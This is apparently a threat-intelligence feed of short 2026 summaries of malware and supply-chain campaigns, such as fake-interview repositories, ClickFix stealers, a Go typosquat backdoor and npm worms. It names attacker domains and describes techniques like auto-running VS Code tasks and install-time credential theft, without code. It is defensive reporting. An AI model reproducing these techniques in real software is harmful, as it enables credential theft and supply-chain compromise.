LATEST THREAT INTELLIGENCE.
Void Dokkaebi Uses Fake Job Interview Lure to Spread Malware via Code Repositories
Description: Void Dokkaebi, also known as Famous Chollima, has evolved its operations into a self-propagating supply chain threat targeting software developers. The North Korea-aligned group uses fabricated job interviews to lure developers into cloning malicious repositories. Once compromised, the victim's machine becomes an infection vector through two mechanisms: malicious VS Code task configurations that execute automatically when workspaces are opened, and active injection of obfuscated JavaScript into source code files with Git history tampering to conceal modifications. This creates a worm-like propagation chain where each compromised developer seeds new repositories with infection vectors. Analysis in March 2026 identified over 750 infected repositories, with contamination reaching organizations including DataStax and Neutralinojs. The campaign delivers payloads via blockchain infrastructure including Tron, Aptos, and Binance Smart Chain, deploying variants of DEV#POPPER RAT and other tools to steal cryptocurre...
Created at: 2026-04-21T12:09:43.074000
Updated at: 2026-05-21T12:05:32.403000
macOS ClickFix Campaign: AppleScript Stealers & New Terminal Protections
Description: A sophisticated ClickFix campaign targets both Windows and macOS users through fake CAPTCHA pages that trick victims into executing malicious commands. The macOS variant deploys an AppleScript-based infostealer that harvests sensitive data including keychain databases, credentials, and session cookies from 12 browsers, over 200 browser extensions, and 16 cryptocurrency wallets. The malware employs a persistent, non-closable dialog box mimicking legitimate system prompts to force victims into providing their system password. Stolen session cookies enable attackers to bypass multi-factor authentication by hijacking active sessions. The campaign uses client-side JavaScript to filter victims by user-agent, directing desktop users to OS-specific payloads while ignoring mobile devices. Latest macOS updates include native terminal security warnings designed to alert users against pasting potentially malicious commands.
Created at: 2026-04-21T02:05:08.869000
Updated at: 2026-05-21T09:40:07.961000
Popular Go Decimal Library Targeted by Long-Running Typosquat with DNS Backdoor
Description: A long-running typosquatting campaign impersonated the widely used shopspring/decimal Go library by publishing github.com/shopsprint/decimal, differing by a single character. Active since November 2017, the package remained benign through seven releases until being weaponized in August 2023 with version v1.3.3. This version introduced a malicious init() function that executes automatically on import, establishing a DNS TXT record-based command and control channel to dnslog-cdn-images.freemyip.com. The backdoor polls every five minutes and executes arbitrary commands returned via TXT records. Although the GitHub repository and owner account have been deleted, the malicious module remains permanently cached and accessible through Go's module proxy system, continuing to pose a supply chain risk to developers who mistype the package name.
Created at: 2026-05-20T03:16:26.858000
Updated at: 2026-05-21T00:33:17.577000
Inside Banana RAT: From Build Server to Banking Fraud
Description: An MDR investigation successfully mapped the complete operational infrastructure of Banana RAT, a Brazilian banking trojan operated by threat cluster SHADOW-WATER-063. The investigation uncovered both server-side and client-side components, revealing a sophisticated FastAPI-based polymorphic payload generation system that produces hash-unique builds to evade detection. The malware employs layered obfuscation, AES-wrapped payloads, and fileless PowerShell execution. Once deployed, it enables operator-driven fraud through remote input control, keylogging, screen streaming, bank-branded overlays, and Pix QR code interception specifically targeting Brazilian financial institutions. The tooling exclusively targets 16 Brazilian banks and crypto exchanges, with all operator artifacts written in Brazilian Portuguese, indicating a financially motivated actor operating within the Tetrade banking trojan ecosystem.
Created at: 2026-05-19T22:26:55.839000
Updated at: 2026-05-21T00:30:44.319000
Latest PyPi Compromise
Description: A supply chain attack targeting the Microsoft DurableTask Python client compromised versions 1.4.1, 1.4.2, and 1.4.3 on PyPi. The threat actor gained access through a compromised GitHub account previously linked to attacks, using stolen credentials to dump GitHub secrets containing PyPi tokens. The evolved payload targets Linux systems, stealing credentials from AWS, Azure, GCP, Kubernetes, Vault, and password managers like Bitwarden and 1Password. It propagates via AWS SSM and Kubernetes lateral movement, limited to 5 targets per infected host. The payload scrapes shell history, bruteforces password managers, and establishes persistence through infection markers. Compromised packages were quarantined following analysis.
Created at: 2026-05-19T22:26:56.337000
Updated at: 2026-05-21T00:26:24.796000
Exposing Fox Tempest: A malware-signing service operation
Description: Fox Tempest is a financially motivated threat actor operating a malware-signing-as-a-service (MSaaS) business used by cybercriminals to distribute malicious code, including ransomware. The actor abuses Microsoft Artifact Signing to generate fraudulent code-signing certificates, allowing malware to evade security controls. Fox Tempest created over a thousand certificates and established hundreds of Azure tenants to support operations. Microsoft revoked over one thousand certificates and disrupted the service in May 2026 through the Digital Crimes Unit. The operation enabled ransomware deployment including Rhysida by threat actors like Vanilla Tempest, and distributed malware families including Oyster, Lumma Stealer, and Vidar. The MSaaS was available through signspace[.]cloud, charging between $5000-$9000 USD. Attacks impacted healthcare, education, government, and financial services sectors globally.
Created at: 2026-05-19T17:52:41.390000
Updated at: 2026-05-21T00:24:05.220000
9 Year-Old PHP Vulnerability Keeps Swinging As One of the Most Targeted Vulnerabilities
Description: CVE-2017-9841, a remote code execution vulnerability in PHPUnit's eval-stdin.php file, remains highly exploited nearly a decade after disclosure. Analysis reveals over 80,000 exploitation attempts detected in 30 days, with 36,500 hits in the last 10 days alone. The vulnerability affects PHPUnit versions prior to 4.8.28 and 5.x before 5.6.3, allowing attackers to execute arbitrary PHP code via POST requests without authentication. Mass-scanning infrastructure targets dozens of framework-specific paths across Laravel, Drupal, Yii, and WordPress installations. Primary attack sources include compromised infrastructure in the UK and US, delivering webshells and botnet payloads. Multiple botnets including RondoDox, Kinsing, KashmirBlack, Sysrv, and Androxgh0st actively exploit this vulnerability. The persistent exploitation stems from developers failing to exclude development dependencies in production environments and exposing vendor directories to web servers.
Created at: 2026-05-19T17:52:42.274000
Updated at: 2026-05-21T00:19:43.890000
Nightmare-Eclipse Tooling Seen in Real-World Intrusion
Description: Activity involving BlueHammer, RedSun, and UnDefend tooling from the Nightmare-Eclipse proof-of-concept repository was observed during a live intrusion investigation. The malicious binaries were staged in user-writable directories including Pictures and Downloads folders, with execution attempts failing despite hands-on-keyboard reconnaissance activities. The threat actor demonstrated unfamiliarity with the tools, misspelling command parameters and attempting non-functional flags. Initial access was traced to compromised FortiGate SSL VPN credentials, with connections originating from Russia, Singapore, and Switzerland. A Go-based tunneling agent dubbed BeigeBurrow was deployed for persistent access, beaconing to attacker infrastructure over port 443 using HashiCorp's yamux library for multiplexed reverse tunneling capabilities.
Created at: 2026-04-20T20:28:22.703000
Updated at: 2026-05-20T20:28:03.316000
Active Supply Chain Attack Compromises Packages on npm
Description: An active npm supply chain attack has compromised packages in the @antv ecosystem, affecting the maintainer account 'atool'. The attack is part of the Mini Shai-Hulud campaign, involving 639 compromised package versions across 323 unique packages. Notable affected packages include echarts-for-react with 1.1 million weekly downloads, and widely-used @antv packages for data visualization. The malware uses obfuscated install-time payloads that harvest developer credentials, GitHub tokens, npm tokens, AWS credentials, and other secrets from development and CI/CD environments. Stolen data is encrypted with AES-256-GCM and exfiltrated to a command-and-control server, with GitHub repositories used as fallback channels. The malware contains worm-like functionality to republish compromised packages and propagate through the npm ecosystem.
Created at: 2026-05-19T08:11:20.341000
Updated at: 2026-05-19T17:46:10.861000
Copycat hits another npm package
Description: A Shai-Hulud copycat worm has infected the npm package chalk-tempalte, appearing just five days after the original worm was open-sourced by its creators. The same threat actor also published three additional malicious npm packages containing infostealer code: @deadcode09284814/axios-util, axois-utils, and color-style-utils. These packages collectively received 2,678 weekly downloads and contain various malicious capabilities including credential theft, cryptocurrency wallet exfiltration, cloud configuration harvesting, and DDoS botnet functionality. The malware exfiltrates stolen data to remote command-and-control servers and uploads credentials to GitHub repositories. Researchers indicate the attacker operates from a home computer or local server farm and appears financially motivated, targeting victims' cryptocurrency assets while potentially offering DDoS-as-a-service capabilities.
Created at: 2026-05-18T22:26:37.400000
Updated at: 2026-05-19T17:39:11.086000
